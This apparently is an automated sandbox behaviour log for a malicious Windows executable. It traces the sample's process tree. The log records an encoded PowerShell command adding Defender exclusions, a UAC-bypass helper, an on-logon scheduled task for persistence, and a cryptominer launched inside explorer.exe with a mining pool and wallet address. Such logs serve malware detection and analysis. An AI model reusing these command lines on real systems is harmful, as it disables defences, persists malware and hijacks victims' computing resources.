Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: GcqJPBLD2Q.exe

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\GcqJPBLD2Q.exe "C:\Users\user\Desktop\GcqJPBLD2Q.exe"
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAeQBnACMAPgA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Cool.exe "C:\Users\user\AppData\Local\Temp\Cool.exe"
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe "C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Cool.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6012 -s 880
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAeQBnACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Cool.exe "C:\Users\user\AppData\Local\Temp\Cool.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe "C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Cool.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6012 -s 880
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140.dll	Jump to behavior
